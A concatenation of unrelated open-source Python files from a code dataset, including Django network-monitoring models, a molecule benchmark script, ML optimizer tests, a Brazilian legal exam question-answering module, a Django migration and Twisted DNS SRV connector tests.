OIDSetMember(models.Model): """Associate :py:class:`.OID`s with :py:class:`.OIDSets`""" oid = models.ForeignKey(OID,db_column="oidid") oid_set = models.ForeignKey(OIDSet,db_column="oidsetid") class Meta: db_table = "oidsetmember" ordering = ["oid_set", "oid"] class DeviceOIDSetMap(models.Model): """Associate :py:class:`.OIDSet`s with :py:class:`.Device`s""" device = models.ForeignKey(Device,db_column="deviceid") oid_set = models.ForeignKey(OIDSet,db_column="oidsetid") class Meta: db_table = "deviceoidsetmap" ordering = ["device", "oid_set"] class IfRefManager(models.Manager): def active(self): qs = super(IfRefManager, self).get_query_set() qs = qs.filter(end_time__gt=now()) return qs class IfRef(models.Model): """Interface metadata. Data is stored with a begin_time and end_time. A new row is only created when one or more columns change. This provides a historical view of the interface metadata. """ device = models.ForeignKey(Device, db_column="deviceid") ifIndex = models.IntegerField(db_column="ifindex") ifDescr = models.CharField(max_length=512, db_column="ifdescr") ifAlias = models.CharField(max_length=512, db_column="ifalias", blank=True, null=True) ipAddr = models.IPAddressField(blank=True, db_column="ipaddr", null=True) ifSpeed = models.BigIntegerField(db_column="ifspeed", blank=True, null=True) ifHighSpeed = models.BigIntegerField(db_column="ifhighspeed", blank=True, null=True) ifMtu = models.IntegerField(db_column="ifmtu", blank=True, null=True) ifType = models.IntegerField(db_column="iftype", blank=True, null=True) ifOperStatus = models.IntegerField(db_column="ifoperstatus", blank=True, null=True) ifAdminStatus = models.IntegerField(db_column="ifadminstatus", blank=True, null=True) begin_time = models.DateTimeField() end_time = models.DateTimeField(default=max_datetime) ifPhysAddress = models.CharField(max_length=32, db_column="ifphysaddress", blank=True, null=True) objects = IfRefManager() class Meta: db_table = "ifref" ordering = ["device__name", "ifDescr"] permissions = ( ("can_see_hidden_ifref", "Can see IfRefs with ifAlias containing :hide:"), ) def __unicode__(self): return "%s (%s) %s"%(self.ifDescr, self.ifIndex, self.ifAlias) def encoded_ifDescr(self): return atencode(self.ifDescr) def to_dict(self): if not self.ifHighSpeed or self.ifHighSpeed == 0: speed = self.ifSpeed else: speed = self.ifHighSpeed * int(1e6) return dict(name=self.ifDescr, descr=self.ifAlias, speed=speed, begin_time=datetime_to_unixtime(self.begin_time), end_time=datetime_to_unixtime(self.end_time), device=self.device.name, ifIndex=self.ifIndex, ifDescr=self.ifDescr, ifAlias=self.ifAlias, ifSpeed=self.ifSpeed, ifHighSpeed=self.ifHighSpeed, ipAddr=self.ipAddr) class ALUSAPRefManager(models.Manager): def active(self): qs = super(ALUSAPRefManager, self).get_query_set() qs = qs.filter(end_time__gt=now()) return qs class ALUSAPRef(models.Model): """Metadata about ALU SAPs.""" device = models.ForeignKey(Device, db_column="deviceid") name = models.CharField(max_length=128) sapDescription = models.CharField(max_length=512, db_column="sapdescription") sapIngressQosPolicyId = models.IntegerField( db_column="sapingressqospolicyid") sapEgressQosPolicyId = models.IntegerField( db_column="sapegressqospolicyid") begin_time = models.DateTimeField() end_time = models.DateTimeField(default=max_datetime) objects = ALUSAPRefManager() class Meta: db_table = "alusapref" ordering = ["device__name", "name"] def __unicode__(self): return "%s %s" % (self.device, self.name) def to_dict(self): return dict(name=self.name, device=self.device.name, sapDescription=self.sapDescription, sapEgressQosPolicyId=self.sapEgressQosPolicyId, sapIngressQosPolicyId=self.sapIngressQosPolicyId, end_time=datetime_to_unixtime(self.end_time), begin_time=datetime_to_unixtime(self.begin_time)) class HistoryTableManager(models.Manager): def active(self): qs = super(HistoryTableManager, self).get_query_set() qs = qs.filter(end_time__gt=now()) return qs class OutletRef(models.Model): device = models.ForeignKey(Device, db_column="deviceid") outletID = models.CharField(max_length=128) outletName = models.CharField(max_length=128) outletStatus = models.IntegerField() outletControlState = models.IntegerField(blank=True, null=True) begin_time = models.DateTimeField() end_time = models.DateTimeField(default=max_datetime) objects = HistoryTableManager() class Meta: db_table = "outletref" ordering = ["device__name", "outletID"] def __unicode__(self): return "%s %s: %s" % (self.device, self.outletID, self.outletName) def to_dict(self): return dict(device=self.device.name, outletID=self.outletID, outletName=self.outletName, outletStatus=self.outletStatus, outletControlState=self.outletControlState) class LSPOpStatus(models.Model): """Metadata about MPLS LSPs.""" device = models.ForeignKey(Device, db_column="deviceid") name = models.CharField(max_length=128) srcAddr = models.IPAddressField() dstAddr = models.IPAddressField() state = models.IntegerField() begin_time = models.DateTimeField() end_time = models.DateTimeField(default=max_datetime) class Meta: db_table = "lspopstatus" ordering = ["device__name", "name"] def __unicode__(self): return "%s %s" % (self.device, self.name) class APIPermissionManager(models.Manager): def get_query_set(self): return super(APIPermissionManager, self).\ get_query_set().filter(content_type__name='api_permission') class APIPermission(Permission): """A global permission, not attached to a model""" objects = APIPermissionManager() class Meta: proxy = True permissions = ( ("esmond_api.view_timeseries", "View timseries data"), ("esmond_api.add_timeseries", "Add timseries data"), ("esmond_api.delete_timeseries", "Delete timseries data"), ("esmond_api.change_timeseries", "Change timseries data"), ) def save(self, *args, **kwargs): ct, created = ContentType.objects.get_or_create( name="api_permission", app_label=self._meta.app_label ) self.content_type = ct super(APIPermission, self).save(*args, **kwargs) ### Models for data inventory class Inventory(models.Model): """Data inventory to drive gap scanning""" # choices for cf to scan RAW_DATA = 'RD' BASE_RATES = 'BR' RATE_AGGS = 'RA' STAT_AGGS = 'SA' COLUMN_FAMILY_CHOICES = ( (RAW_DATA, 'raw_data'), (BASE_RATES, 'base_rates'), (RATE_AGGS, 'rate_aggregations'), (STAT_AGGS, 'stat_aggregations') ) # fields row_key = models.CharField(max_length=128, unique=True) start_time = models.DateTimeField() end_time = models.DateTimeField() last_scan_point = models.DateTimeField(null=True, blank=True) scan_complete = models.BooleanField(default=False) column_family = models.CharField(max_length=2, choices=COLUMN_FAMILY_CHOICES, default=BASE_RATES) class Meta: db_table = 'inventory' ordering = ['row_key'] def __unicode__(self): return self.row_key def to_dict(self): return dict( row_key=self.row_key, last_scan_point=self.last_scan_point, scan_complete=self.scan_complete ) class GapInventory(models.Model): """Inventory of gaps existing in the data""" row = models.ForeignKey(Inventory, db_column='keyid') start_time = models.DateTimeField() end_time = models.DateTimeField() processed = models.BooleanField(default=False) class Meta: db_table = 'gap_inventory' ordering = ['row__row_key'] def __unicode__(self): return self.row.row_key def to_dict(self): return dict( row=self.row.row_key, processed=self.processed )
StarcoderdataPython
3234897
import argparse import os from guacamol.assess_distribution_learning import assess_distribution_learning from guacamol.utils.helpers import setup_default_logger from .generator import RandomSmilesSampler if __name__ == "__main__": setup_default_logger() parser = argparse.ArgumentParser( description="Molecule distribution learning benchmark for random smiles sampler", formatter_class=argparse.ArgumentDefaultsHelpFormatter, ) parser.add_argument("--dist_file", default="data/guacamol_v1_all.smiles") parser.add_argument("--output_dir", default=None, help="Output directory") parser.add_argument("--suite", default="v2") args = parser.parse_args() if args.output_dir is None: args.output_dir = os.path.dirname(os.path.realpath(__file__)) with open(args.dist_file, "r") as smiles_file: smiles_list = [line.strip() for line in smiles_file.readlines()] generator = RandomSmilesSampler(molecules=smiles_list) json_file_path = os.path.join(args.output_dir, "distribution_learning_results.json") assess_distribution_learning( generator, chembl_training_file=args.dist_file, json_output_file=json_file_path, benchmark_version=args.suite, )
StarcoderdataPython
134230
# -*- coding: utf-8 -*- from ._compat import FileNotFoundError class TimezoneNotFound(FileNotFoundError): pass
StarcoderdataPython
3388868
# flake8: noqa from .loader import Loader
StarcoderdataPython
1772287
<reponame>chunzhang-hub/PaddleHub # coding=utf-8 import os import time from collections import OrderedDict import cv2 import numpy as np from ace2p.processor import get_direction, get_3rd_point, get_affine_transform __all__ = ['reader'] def _box2cs(box, aspect_ratio): x, y, w, h = box[:4] return _xywh2cs(x, y, w, h, aspect_ratio) def _xywh2cs(x, y, w, h, aspect_ratio, pixel_std=200): center = np.zeros((2), dtype=np.float32) center[0] = x + w * 0.5 center[1] = y + h * 0.5 if w > aspect_ratio * h: h = w * 1.0 / aspect_ratio elif w < aspect_ratio * h: w = h * aspect_ratio scale = np.array([w * 1.0 / pixel_std, h * 1.0 / pixel_std], dtype=np.float32) return center, scale def preprocess(org_im, scale, rotation): image = org_im.copy() image_height, image_width, _ = image.shape aspect_ratio = scale[1] * 1.0 / scale[0] image_center, image_scale = _box2cs([0, 0, image_width - 1, image_height - 1], aspect_ratio) trans = get_affine_transform(image_center, image_scale, rotation, scale) image = cv2.warpAffine( image, trans, (int(scale[1]), int(scale[0])), flags=cv2.INTER_LINEAR, borderMode=cv2.BORDER_CONSTANT, borderValue=(0, 0, 0)) img_mean = np.array([0.406, 0.456, 0.485]).reshape((1, 1, 3)) img_std = np.array([0.225, 0.224, 0.229]).reshape((1, 1, 3)) image = image.astype(np.float) image = (image / 255.0 - img_mean) / img_std image = image.transpose(2, 0, 1).astype(np.float32) image_info = { 'image_center': image_center, 'image_height': image_height, 'image_width': image_width, 'image_scale': image_scale, 'rotation': rotation, 'scale': scale } return image, image_info def reader(images, paths, scale, rotation): """ Preprocess to yield image. Args: images (list(numpy.ndarray)): images data, shape of each is [H, W, C] paths (list[str]): paths to images. scale (tuple): size of preprocessed image. rotation (int): rotation angle, used for obtaining affine matrix in preprocess. Yield: element (collections.OrderedDict): info of original image and preprocessed image. """ component = list() if paths: for im_path in paths: each = OrderedDict() assert os.path.isfile(im_path), "The {} isn't a valid file path.".format(im_path) im = cv2.imread(im_path) each['org_im'] = im each['org_im_path'] = im_path component.append(each) if images is not None: assert type(images) is list, "images should be a list." for im in images: each = OrderedDict() each['org_im'] = im each['org_im_path'] = 'ndarray_time={}.jpg'.format(round(time.time(), 6) * 1e6) component.append(each) for element in component: element['image'], element['image_info'] = preprocess(element['org_im'], scale, rotation) yield element
StarcoderdataPython
3373902
import cv2 def pixel_diff(path1, path2): image1 = cv2.imread(path1) image2 = cv2.imread(path2) image1 = cv2.resize(image1, None, fx=.5, fy=.5) image2 = cv2.resize(image2, None, fx=.5, fy=.5) difference = cv2.subtract(image1, image2) # difference = cv2.resize(difference, None, fx=.5, fy=.5) cv2.imshow("difference", difference) cv2.waitKey() cv2.destroyAllWindows()
StarcoderdataPython
11895
import jax import elegy import unittest import numpy as np import jax.numpy as jnp import optax class MLP(elegy.Module): """Standard LeNet-300-100 MLP network.""" n1: int n2: int def __init__(self, n1: int = 3, n2: int = 4): super().__init__() self.n1 = n1 self.n2 = n2 def call(self, image: jnp.ndarray, training: bool): x = image.astype(jnp.float32) / 255.0 x = jnp.reshape(x, [x.shape[0], -1]) x = elegy.nn.Linear(self.n1)(x) x = elegy.nn.BatchNormalization()(x) x = jax.nn.relu(x) x = elegy.nn.Linear(self.n2)(x) x = jax.nn.relu(x) x = elegy.nn.Linear(10)(x) return x class OptimizerTest(unittest.TestCase): def test_optimizer(self): optax_op = optax.adam(1e-3) lr_schedule = lambda step, epoch: step / 3 optimizer = elegy.Optimizer(optax_op, lr_schedule=lr_schedule) params = np.random.uniform((3, 4)) grads = np.random.uniform((3, 4)) rng = elegy.RNGSeq(42) optimizer_states = optimizer.init(rng, params) assert jnp.allclose(optimizer.current_lr(optimizer_states), 0 / 3) params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng) assert jnp.allclose(optimizer.current_lr(optimizer_states), 1 / 3) params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng) assert jnp.allclose(optimizer.current_lr(optimizer_states), 2 / 3) params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng) assert jnp.allclose(optimizer.current_lr(optimizer_states), 3 / 3) def test_optimizer_epoch(self): optax_op = optax.adam(1e-3) lr_schedule = lambda step, epoch: epoch optimizer = elegy.Optimizer( optax_op, lr_schedule=lr_schedule, steps_per_epoch=2 ) params = np.random.uniform((3, 4)) grads = np.random.uniform((3, 4)) rng = elegy.RNGSeq(42) optimizer_states = optimizer.init( rng=rng, net_params=params, ) assert jnp.allclose(optimizer.current_lr(optimizer_states), 0) params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng) assert jnp.allclose(optimizer.current_lr(optimizer_states), 0) params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng) assert jnp.allclose(optimizer.current_lr(optimizer_states), 1) params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng) assert jnp.allclose(optimizer.current_lr(optimizer_states), 1) params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng) def test_optimizer_chain(self): optimizer = elegy.Optimizer( optax.sgd(0.1), optax.clip(0.5), ) params = np.zeros(shape=(3, 4)) grads = np.ones(shape=(3, 4)) * 100_000 rng = elegy.RNGSeq(42) optimizer_states = optimizer.init( rng=rng, net_params=params, ) params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng) assert np.all(-0.5 <= params) and np.all(params <= 0.5) def test_lr_logging(self): model = elegy.Model( module=MLP(n1=3, n2=1), loss=elegy.losses.SparseCategoricalCrossentropy(from_logits=True), metrics=elegy.metrics.SparseCategoricalAccuracy(), optimizer=elegy.Optimizer( optax.adamw(1.0, b1=0.95), lr_schedule=lambda step, epoch: jnp.array(1e-3), ), run_eagerly=True, ) X = np.random.uniform(size=(5, 7, 7)) y = np.random.randint(10, size=(5,)) history = model.fit( x=X, y=y, epochs=1, steps_per_epoch=1, batch_size=5, validation_data=(X, y), shuffle=True, verbose=0, ) assert "lr" in history.history assert np.allclose(history.history["lr"], 1e-3)
StarcoderdataPython
3382779
from vkbottle.framework.bot import Bot from vkbottle.types.message import Message from vkbottle.framework.blueprint.bot import Blueprint
StarcoderdataPython
1733048
import os import astropy.units as u from astropy.coordinates import SkyCoord from banzai.stages import Stage from banzai import logs class PointingTest(Stage): """ A test to determine whether or not the poiting error on the frame (as determined by a WCS solve) is within tolerance. """ # Typical pointing is within 5" of requested pointing (decimal degrees). WARNING_THRESHOLD = 30.0 SEVERE_THRESHOLD = 300.0 def __init__(self, pipeline_context): super(PointingTest, self).__init__(pipeline_context) @property def group_by_keywords(self): return None def setup_logging(self, image): self.logging_tags = logs.image_config_to_tags(image, self.group_by_keywords) logs.add_tag(self.logging_tags, 'filename', os.path.basename(image.filename)) def do_stage(self, images): for image in images: self.setup_logging(image) try: # OFST-RA/DEC is the same as CAT-RA/DEC but includes user requested offset requested_coords = SkyCoord(image.header['OFST-RA'], image.header['OFST-DEC'], unit=(u.hour, u.deg), frame='icrs') except ValueError as e: try: # Fallback to CAT-RA and CAT-DEC requested_coords = SkyCoord(image.header['CAT-RA'], image.header['CAT-DEC'], unit=(u.hour, u.deg), frame='icrs') except: self.logger.error(e, extra=self.logging_tags) continue # This only works assuming CRPIX is at the center of the image solved_coords = SkyCoord(image.header['CRVAL1'], image.header['CRVAL2'], unit=(u.deg, u.deg), frame='icrs') angular_separation = solved_coords.separation(requested_coords).arcsec logs.add_tag(self.logging_tags, 'PNTOFST', angular_separation) if abs(angular_separation) > self.SEVERE_THRESHOLD: self.logger.error('Pointing offset exceeds threshold', extra=self.logging_tags) elif abs(angular_separation) > self.WARNING_THRESHOLD: self.logger.warning('Pointing offset exceeds threshhold', extra=self.logging_tags) image.header['PNTOFST'] = ( angular_separation, '[arcsec] offset of requested and solved center' ) return images
StarcoderdataPython
3225156
import copy import csv import os import json from functools import reduce import collections from lxml import etree import nltk import numpy import networkx nltk.download('punkt') """ ## examples # parse OAB exam, return generator of OABQuestion instances oab = parse_xml('/home/bruno/git/oab-exams/OAB/raw/2010-01.xml') questions = questions_in_tree(oab) first_q = next(questions) # parse law XML, return tuple (article-ID, list-of-raw-article-text) lei = law_articles_in_file('/home/bruno/git/oab-exams/lexml/lei-8906.xml') leis = all_law_articles_in_path('/home/bruno/git/oab-exams/lexml/') # create an instance of collection of articles, which processes the # text in each article, creates a node for each, creates a graph of # them, and caches their TF-IDF vectors artcol = ArticleCollection(leis, rm_stopwords=True) laws = read_laws_into_artcollection('/home/bruno/git/oab-exams/lexml/', False, True) # see code for arguments # add first question to graph constructed from the articles in artcol # return the shortest path and distance from the question statement # to each item paths_dict = question_paths_in_graph(artcol, first_q) # shallow question answering justified questions in justify.txt, using # laws in lexml/ and getting the questions at OAB/raw/ result = sqa_justified_questions('doc/justify.txt', 'lexml/', 'OAB/raw/', rm_stopwords=True, separate=False) # shallow question answering non-justified questions in an exam paths = sqa_questions_in_exam('/home/bruno/git/oab-exams/OAB/raw/2016-20a.xml', artcol, max_questions=10) # calculate paths and write them to json questions_in_exams_to_json('exams_path', artcol, max_questions=10) """ # ## reading XML def parse_xml(path, parser=etree.XMLParser(remove_blank_text=True)): return etree.parse(path) def elements_in_tree(tree, element_tag): assert isinstance(tree, etree._ElementTree) for element in tree.getiterator(tag=element_tag): yield element # ## reading OAB exams def get_exam_id(tree): exam_id = tree.getroot() return exam_id.get('year')+'-'+exam_id.get('edition') def get_statement_text(question): return question.find('statement').text def get_items(question): return question.find('items').getchildren() def get_correct_item(question): for i in get_items(question): if i.get('correct') == "true": return i.get('letter') def make_items_dict(items): return dict((i.get('letter'), getattr(i, 'text')) for i in items) class OABQuestion(): def __init__(self, number, exam, valid, statement, items, justification=None): self.number = number self.exam = exam self.valid = valid self.statement = statement self.items = items self.justification = justification def str_repr(self): if self.valid and self.justification: return "OAB:{}|Q{}|ans:{}|just:{}".format(self.exam, self.number, self.valid, self.justification) elif self.valid: return "OAB:{}|Q{}|ans:{}|just:{}".format(self.exam, self.number, self.valid, ".") else: return "OAB:{}|Q{}|ans:{}".format(self.exam, self.number, "NULL") def __repr__(self): return self.str_repr() def questions_in_tree(tree): for question in elements_in_tree(tree, 'question'): yield OABQuestion(question.get('number'), get_exam_id(tree), get_correct_item(question), get_statement_text(question), make_items_dict(get_items(question))) # ## reading law XML # lexML namespaces def namespace_it(namespace, key, element): # namespaced element in {namespace}element syntax return "{{{}}}{}".format(namespace[key], element) def lazy_articles_in_tree(tree): for artigo in elements_in_tree(tree, namespace_it(tree.getroot().nsmap, None, 'Artigo')): yield artigo.get('id'), ''.join(artigo.itertext()) def articles_in_tree(tree): return list(lazy_articles_in_tree(tree)) def get_urn(law_xml): assert isinstance(law_xml, etree._ElementTree) # fixme http://lxml.de/xpathxslt.html#namespaces-and-prefixes id_element = law_xml.find(namespace_it(law_xml.getroot().nsmap, None, 'Metadado') + '/' + namespace_it(law_xml.getroot().nsmap, None, 'Identificacao')) return id_element.get('URN') def law_articles_in_file(law_path): law_xml = parse_xml(law_path) law_urn = get_urn(law_xml) return (law_urn, articles_in_tree(law_xml)) def all_law_articles_in_path(laws_path): # reads all .xml files in laws_path to a list of law_articles assert os.path.isdir(laws_path) laws = [] for file in os.scandir(laws_path): if file.name.endswith(".xml"): law = law_articles_in_file(file.path) laws.append(law) return laws # ## text processing def is_number(token): try: float(token.replace(',', '.').replace('º', '')) except ValueError: return False return True def is_punctuation(token): if token in '!"#$%&\'()*+,-./:;<=>?@[\\]^_`´{|}~§–': return True def is_stopword(token, language='portuguese'): if token in nltk.corpus.stopwords.words(language): return True def is_useful(token, rm_stopwords): token = token.strip() if is_number(token) or is_punctuation(token) or (rm_stopwords and is_stopword(token)): return False else: return True def preprocess_text(text, rm_stopwords): assert isinstance(rm_stopwords, bool) return [token.lower().strip() for token in nltk.tokenize.word_tokenize(text) if is_useful(token, rm_stopwords)] # ## tf-idf and base graph making def cosine_similarity(vec1, vec2): denominator = numpy.linalg.norm(vec1) * numpy.linalg.norm(vec2) if denominator == 0: return 0 else: return numpy.dot(vec1, vec2) / denominator class ArticleCollection(nltk.TextCollection): # source is [(law-urn [(art-id, raw-art-text)+])+] def __init__(self, source, rm_stopwords=False, text_preprocessing_fn=preprocess_text, similarity_fn=cosine_similarity): assert isinstance(source, list) self.rm_stopwords = rm_stopwords self._text_preprocessing_fn = text_preprocessing_fn self._similarity_fn = similarity_fn # map article id to its index self.ids, self.raw_texts = self.make_ids_and_raw_texts(source) self.laws = [law[0] for law in source] # remove law id # so that we have useful methods such as .idf(token) nltk.TextCollection.__init__(self, list(map(lambda x: text_preprocessing_fn(x, self.rm_stopwords), self.raw_texts))) # index tokens to create TF-IDF vector self.token_index_dict = {key:ix for ix, key in enumerate(self.vocab().keys())} self.vocab_size = len(self.vocab().keys()) self.tfidf_vectors = [self.tfidf_vectorize(text) for text in self._texts] self.size = len(self._texts) # graph w/ only the articles as nodes, no edges self.base_graph = self.make_base_graph() def __repr__(self): return "ArticleCollection: {}".format(self.laws) def make_ids_and_raw_texts(self, source): ids = {} raw_texts = [] ix = 0 for law in source: law_id = law[0] for article in law[1]: art_id = article[0] art_id = law_id + art_id ids[art_id] = ix raw_texts.append(article[1]) ix += 1 return ids, raw_texts def tf_tokens(self, tokens): count = collections.Counter(tokens) length = len(tokens) return list(map(lambda x: count[x]/length, tokens)) def tfidf_vectorize(self, text): # text must be preprocessed first! tfidf_vector = numpy.zeros(self.vocab_size) tf_vector = self.tf_tokens(text) for ix, token in enumerate(text): idf = self.idf(token) if idf == 0: continue tfidf_vector[self.token_index_dict[token]] = tf_vector[ix] * idf return tfidf_vector def inverse_similarity(self, vec1, vec2): similarity = self._similarity_fn(vec1, vec2) if similarity == 0: return numpy.Infinity else: return 1 / similarity def make_base_graph(self): graph = networkx.DiGraph() graph.add_nodes_from(self.ids.keys()) return graph # ## add questions def add_temporary_node(graph, artcol, text, label, to_nodes=True): """ article_collection is where graph and tfidf-calculation happen, text is raw question statement (which is preprocessed here) and label is question number in str. to_nodes is the direction of the edges to be built. should be from new node to the nodes already present, or from them to the node being added? """ graph.add_node(label) label_tfidf = artcol.tfidf_vectorize(artcol._text_preprocessing_fn(text, artcol.rm_stopwords)) # to add edges only to the articles, and not every node for node_id in artcol.ids.keys(): node_ix = artcol.ids[node_id] if to_nodes: graph.add_edge(label, node_id, weight=artcol.inverse_similarity(label_tfidf, artcol.tfidf_vectors[node_ix])) else: graph.add_edge(node_id, label, weight=artcol.inverse_similarity(label_tfidf, artcol.tfidf_vectors[node_ix])) return graph def question_paths_in_graph(article_collection, oab_question): """ return distance and shortest path from statement to each item in oab_question. note that '1' (str) means question one. """ assert isinstance(article_collection, ArticleCollection) assert isinstance(oab_question, OABQuestion) # so that base_graph is not changed improperly: graph = copy.deepcopy(article_collection.base_graph) # add question statement: graph = add_temporary_node(graph, article_collection, oab_question.statement, oab_question.number, to_nodes=True) paths = {} for question_letter, item_text in oab_question.items.items(): graph = add_temporary_node(graph, article_collection, item_text, question_letter, to_nodes=False) paths[question_letter] = networkx.algorithms.shortest_paths.bidirectional_dijkstra(graph, oab_question.number, question_letter, weight='weight') return paths # ## add justified questions def read_laws_into_separate_artcol(laws_path, rm_stopwords): laws = {} for file in os.scandir(laws_path): if file.name.endswith(".xml"): urn, artigos = law_articles_in_file(file.path) artcol = ArticleCollection([(urn, artigos)], rm_stopwords) laws[urn] = artcol return laws def read_laws_into_artcollection(laws_path, separate, rm_stopwords=False): # reads all .xml files in laws_path to a dictionary of urn:artcol assert os.path.isdir(laws_path) if separate: laws = read_laws_into_separate_artcol(laws_path, rm_stopwords) else: laws_list = all_law_articles_in_path(laws_path) laws = ArticleCollection(laws_list, rm_stopwords) return laws def get_law_artcol(laws, urn, separate): if separate: return laws[urn] else: return laws def find_question(oab_exam, question_nr): assert isinstance(oab_exam, etree._ElementTree) for question in questions_in_tree(oab_exam): if question.number == question_nr: return question def sqa_justified_questions(justification_path, laws_path, exams_path, rm_stopwords=False, separate=True): # sqa = shallow question answering # justification file must be in the format described in docs. assert os.path.isfile(justification_path) assert os.path.isdir(exams_path) laws = read_laws_into_artcollection(laws_path, separate, rm_stopwords) question_paths = {} with open(justification_path, 'r') as tsv: tsv = csv.reader(tsv, delimiter='\t') for row in tsv: # row[0]: OAB exam filename exam_path = os.path.join(exams_path, row[0] + '.xml') oab_exam = parse_xml(exam_path) # row[1]: question number question = find_question(oab_exam, row[1]) # row[3]: justification law URN artcol = get_law_artcol(laws, row[3], separate) # row[2]: justification article question.justification = (row[3], row[2]) paths = question_paths_in_graph(artcol, question) question_paths[question] = paths return question_paths def get_minimum_paths(question_paths): minimum_paths = {} for question, item_paths in question_paths.items(): paths = [] for item, item_path in item_paths.items(): paths.append(item_path) minimum_path = reduce(lambda x,y: y if x[0]>y[0] else x if x[0] < y[0] else x + ("can't decide between {} and {}".format(x[1],y[1]),), paths) minimum_paths[question] = minimum_path return minimum_paths def get_correct_item_paths(question_paths): correct_paths = {} for question, item_paths in question_paths.items(): if not question.valid: continue correct_letter = question.valid correct_item_path = item_paths[correct_letter] correct_paths[question] = correct_item_path return correct_paths def check_justification_correct_items(question_paths): # return True if justification for the correct article match with # the correct justification correct_items = {} for question, item_paths in question_paths.items(): correct_letter = question.valid correct_item_path = item_paths[correct_letter] selected_article = correct_item_path[1][1] justification_urn = question.justification[0] justification_articles = question.justification[1].split(',') justification = list(map(lambda x: justification_urn + x, justification_articles)) correct_items[question] = (selected_article in justification) return correct_items # ## assign article to question def sqa_questions_in_exam(exam_path, artcol, max_questions=-1): assert os.path.isfile(exam_path) exam = parse_xml(exam_path) question_paths = {} for ix, question in enumerate(questions_in_tree(exam)): if ix == max_questions: break paths = question_paths_in_graph(artcol, question) question_paths[question] = paths return question_paths def make_paths_printable(question_paths): printable_paths = {} for question, item_paths in question_paths.items(): question_str = question.str_repr() printable_paths[question_str] = item_paths return printable_paths def to_json(dictionary, path): with open(path, 'w') as f: json.dump(dictionary, f, indent=4) def questions_in_exams_to_json(exams_path, artcol, max_questions=-1): # make this work with all functions later assert os.path.isdir(exams_path) paths = {} for file in os.scandir(exams_path): if file.name.endswith(".xml"): exam_question_paths = sqa_questions_in_exam(file.path, artcol, max_questions=max_questions) paths[file.name] = make_paths_printable(exam_question_paths) result_path = os.path.join(os.path.dirname(file.path), 'results.json') to_json(paths, result_path)
StarcoderdataPython
3209671
from .tictactoe import main main()
StarcoderdataPython
138255
# Generated by Django 2.2.24 on 2022-01-23 01:09 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ("petition", "0041_merge_20211212_2109"), ] operations = [ migrations.AddField( model_name="generatedpetition", name="age", field=models.PositiveIntegerField(null=True), ), migrations.AddField( model_name="generatedpetition", name="county", field=models.CharField(blank=True, max_length=256, null=True), ), migrations.AddField( model_name="generatedpetition", name="jurisdiction", field=models.CharField( choices=[ ("D", "DISTRICT COURT"), ("S", "SUPERIOR COURT"), ("N/A", "NOT AVAILABLE"), ], max_length=255, null=True, ), ), migrations.AddField( model_name="generatedpetition", name="race", field=models.CharField(max_length=256, null=True), ), migrations.AddField( model_name="generatedpetition", name="sex", field=models.CharField( choices=[ ("M", "Male"), ("F", "Female"), ("U", "Unknown"), ("N/A", "NOT AVAILABLE"), ], default="N/A", max_length=6, null=True, ), ), migrations.AlterField( model_name="petition", name="county", field=models.CharField(blank=True, max_length=256), ), ]
StarcoderdataPython
1611995
<gh_stars>1-10 # Copyright (c) Twisted Matrix Laboratories. # See LICENSE for details. """ Test cases for L{twisted.names.srvconnect}. """ from twisted.internet import defer, protocol from twisted.names import client, dns, srvconnect from twisted.names.common import ResolverBase from twisted.names.error import DNSNameError from twisted.internet.error import DNSLookupError, ServiceNameUnknownError from twisted.trial import unittest from twisted.test.proto_helpers import MemoryReactor class FakeResolver(ResolverBase): """ Resolver that only gives out one given result. Either L{results} or L{failure} must be set and will be used for the return value of L{_lookup} @ivar results: List of L{dns.RRHeader} for the desired result. @type results: C{list} @ivar failure: Failure with an exception from L{twisted.names.error}. @type failure: L{Failure<twisted.python.failure.Failure>} """ def __init__(self, results=None, failure=None): self.results = results self.failure = failure def _lookup(self, name, cls, qtype, timeout): """ Return the result or failure on lookup. """ if self.results is not None: return defer.succeed((self.results, [], [])) else: return defer.fail(self.failure) class DummyFactory(protocol.ClientFactory): """ Dummy client factory that stores the reason of connection failure. """ def __init__(self): self.reason = None def clientConnectionFailed(self, connector, reason): self.reason = reason class SRVConnectorTest(unittest.TestCase): """ Tests for L{srvconnect.SRVConnector}. """ def setUp(self): self.patch(client, 'theResolver', FakeResolver()) self.reactor = MemoryReactor() self.factory = DummyFactory() self.connector = srvconnect.SRVConnector(self.reactor, 'xmpp-server', 'example.org', self.factory) def test_SRVPresent(self): """ Test connectTCP gets called with the address from the SRV record. """ payload = dns.Record_SRV(port=6269, target='host.example.org', ttl=60) client.theResolver.results = [dns.RRHeader(name='example.org', type=dns.SRV, cls=dns.IN, ttl=60, payload=payload)] self.connector.connect() self.assertIdentical(None, self.factory.reason) self.assertEqual( self.reactor.tcpClients.pop()[:2], ('host.example.org', 6269)) def test_SRVNotPresent(self): """ Test connectTCP gets called with fallback parameters on NXDOMAIN. """ client.theResolver.failure = DNSNameError('example.org') self.connector.connect() self.assertIdentical(None, self.factory.reason) self.assertEqual( self.reactor.tcpClients.pop()[:2], ('example.org', 'xmpp-server')) def test_SRVNoResult(self): """ Test connectTCP gets called with fallback parameters on empty result. """ client.theResolver.results = [] self.connector.connect() self.assertIdentical(None, self.factory.reason) self.assertEqual( self.reactor.tcpClients.pop()[:2], ('example.org', 'xmpp-server')) def test_SRVNoResultUnknownServiceDefaultPort(self): """ connectTCP gets called with default port if the service is not defined. """ self.connector = srvconnect.SRVConnector(self.reactor, 'thisbetternotexist', 'example.org', self.factory, defaultPort=5222) client.theResolver.failure = ServiceNameUnknownError() self.connector.connect() self.assertIdentical(None, self.factory.reason) self.assertEqual( self.reactor.tcpClients.pop()[:2], ('example.org', 5222)) def test_SRVNoResultUnknownServiceNoDefaultPort(self): """ Connect fails on no result, unknown service and no default port. """ self.connector = srvconnect.SRVConnector(self.reactor, 'thisbetternotexist', 'example.org', self.factory) client.theResolver.failure = ServiceNameUnknownError() self.connector.connect() self.assertTrue(self.factory.reason.check(ServiceNameUnknownError)) def test_SRVBadResult(self): """ Test connectTCP gets called with fallback parameters on bad result. """ client.theResolver.results = [dns.RRHeader(name='example.org', type=dns.CNAME, cls=dns.IN, ttl=60, payload=None)] self.connector.connect() 